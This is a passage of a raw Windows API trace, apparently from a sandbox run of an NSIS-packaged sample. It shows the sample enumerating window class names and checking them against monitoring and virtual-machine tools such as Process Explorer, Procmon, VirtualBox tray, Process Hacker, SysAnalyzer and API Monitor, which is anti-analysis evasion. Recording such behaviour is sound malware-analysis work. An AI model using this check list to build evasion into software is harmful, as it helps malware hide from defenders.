lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.537] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.537] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.537] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.537] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.537] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.537] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetWindowText(p r1, t.r2, i1024)", iMaxLength=1024 | out: lpString1="user32::GetWindowText(p r1, t.r2, i1024)") returned="user32::GetWindowText(p r1, t.r2, i1024)" [0158.537] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.538] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.538] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.538] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.538] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.538] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.538] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.538] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.538] lstrcpynA (in: lpString1=0x341200, lpString2="65714", iMaxLength=1024 | out: lpString1="65714") returned="65714" [0158.538] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.539] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.539] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.539] GetWindowTextA (in: hWnd=0x100b2, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.539] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.539] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.539] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.539] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65714") returned 5 [0158.540] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.540] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.540] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.540] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.540] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.540] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.540] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.540] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetClassName(p r1, t.r3, i1024)", iMaxLength=1024 | out: lpString1="user32::GetClassName(p r1, t.r3, i1024)") returned="user32::GetClassName(p r1, t.r3, i1024)" [0158.540] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.540] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.540] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.540] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.541] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.541] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.541] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.541] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.541] lstrcpynA (in: lpString1=0x340df8, lpString2="65714", iMaxLength=1024 | out: lpString1="65714") returned="65714" [0158.542] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.542] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.542] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.542] GetClassNameA (in: hWnd=0x100b2, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.542] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.542] lstrcpynA (in: lpString1=0x341200, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.542] lstrcpyA (in: lpString1=0x430c00, lpString2="tooltips_class32" | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.542] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65714") returned 5 [0158.542] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.542] lstrlenA (lpString="0") returned 1 [0158.542] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.542] lstrlenA (lpString="tooltips_class32") returned 16 [0158.542] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.542] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCEXPL", iMaxLength=1024 | out: lpString1="PROCEXPL") returned="PROCEXPL" [0158.542] lstrcmpiA (lpString1="tooltips_class32", lpString2="PROCEXPL") returned 1 [0158.542] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.542] lstrlenA (lpString="tooltips_class32") returned 16 [0158.542] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.542] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCMON_WINDOW_CLASS", iMaxLength=1024 | out: lpString1="PROCMON_WINDOW_CLASS") returned="PROCMON_WINDOW_CLASS" [0158.543] lstrcmpiA (lpString1="tooltips_class32", lpString2="PROCMON_WINDOW_CLASS") returned 1 [0158.543] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.543] lstrlenA (lpString="tooltips_class32") returned 16 [0158.543] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.543] lstrcpynA (in: lpString1=0x40b018, lpString2="VBoxTrayToolWndClass", iMaxLength=1024 | out: lpString1="VBoxTrayToolWndClass") returned="VBoxTrayToolWndClass" [0158.543] lstrcmpiA (lpString1="tooltips_class32", lpString2="VBoxTrayToolWndClass") returned -1 [0158.543] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.543] lstrlenA (lpString="tooltips_class32") returned 16 [0158.543] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.543] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.543] lstrcmpiA (lpString1="tooltips_class32", lpString2="VMSwitchUserControlClass") returned -1 [0158.543] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.543] lstrlenA (lpString="tooltips_class32") returned 16 [0158.543] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.543] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessLasso_Notification_Class", iMaxLength=1024 | out: lpString1="ProcessLasso_Notification_Class") returned="ProcessLasso_Notification_Class" [0158.543] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessLasso_Notification_Class") returned 1 [0158.543] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.543] lstrlenA (lpString="tooltips_class32") returned 16 [0158.543] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.543] lstrcpynA (in: lpString1=0x40b018, lpString2="SmartSniff", iMaxLength=1024 | out: lpString1="SmartSniff") returned="SmartSniff" [0158.543] lstrcmpiA (lpString1="tooltips_class32", lpString2="SmartSniff") returned 1 [0158.543] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.543] lstrlenA (lpString="tooltips_class32") returned 16 [0158.543] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.543] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.543] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessHacker") returned 1 [0158.543] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.543] lstrlenA (lpString="tooltips_class32") returned 16 [0158.544] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.544] lstrcpynA (in: lpString1=0x40b018, lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}", iMaxLength=1024 | out: lpString1="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}" [0158.544] lstrcmpiA (lpString1="tooltips_class32", lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned 1 [0158.544] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.544] lstrlenA (lpString="tooltips_class32") returned 16 [0158.544] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.544] lstrcpynA (in: lpString1=0x40b018, lpString2="SysAnalyzer", iMaxLength=1024 | out: lpString1="SysAnalyzer") returned="SysAnalyzer" [0158.544] lstrcmpiA (lpString1="tooltips_class32", lpString2="SysAnalyzer") returned 1 [0158.544] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.544] lstrlenA (lpString="tooltips_class32") returned 16 [0158.544] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.544] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.544] lstrcmpiA (lpString1="tooltips_class32", lpString2="VMSwitchUserControlClass") returned -1 [0158.544] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.544] lstrlenA (lpString="tooltips_class32") returned 16 [0158.544] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.544] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.544] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessHacker") returned 1 [0158.544] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.544] lstrlenA (lpString="") returned 0 [0158.544] lstrcpynA (in: lpString1=0x40ac18, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.544] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.544] lstrcmpiA (lpString1="", lpString2="0") returned -1 [0158.544] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.544] lstrlenA (lpString="") returned 0 [0158.544] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.544] lstrcpynA (in: lpString1=0x337684, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.545] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.545] lstrlenA (lpString="3399936") returned 7 [0158.545] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.545] lstrcpynA (in: lpString1=0x40a418, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.545] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.545] lstrcpynA (in: lpString1=0x337acc, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.545] lstrcpynA (in: lpString1=0x432800, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.545] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.545] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.545] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.545] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.545] lstrlenA (lpString="") returned 0 [0158.545] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.545] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.545] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.545] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.545] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.545] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.545] lstrlenA (lpString="") returned 0 [0158.545] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.546] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.546] lstrlenA (lpString="") returned 0 [0158.546] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.546] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.546] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.546] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.546] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.546] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.546] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.546] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.546] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.546] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.546] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.546] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.547] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.549] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.550] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.550] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.550] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.550] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.550] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.550] lstrcpynA (in: lpString1=0x3401e0, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.550] lstrcpynA (in: lpString1=0x340df8, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.550] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.550] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.550] lstrcpynA (in: lpString1=0x3401e0, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.550] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.551] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.551] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.551] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.551] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.551] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.551] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.551] lstrlenA (lpString="0") returned 1 [0158.551] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.551] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.551] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.551] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.551] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.551] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.551] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.551] lstrlenA (lpString="0") returned 1 [0158.551] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.551] lstrlenA (lpString="") returned 0 [0158.551] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.551] lstrcpynA (in: lpString1=0x337684, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.551] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.551] lstrlenA (lpString="3399936") returned 7 [0158.552] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.552] lstrcpynA (in: lpString1=0x40a418, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.552] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.552] lstrcpynA (in: lpString1=0x337acc, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.552] lstrcpynA (in: lpString1=0x432800, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.552] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.552] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.552] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.552] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.552] lstrlenA (lpString="") returned 0 [0158.552] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.552] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.552] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.552] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.552] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.552] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.552] lstrlenA (lpString="") returned 0 [0158.552] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.552] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.552] lstrlenA (lpString="") returned 0 [0158.552] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.552] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.552] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") 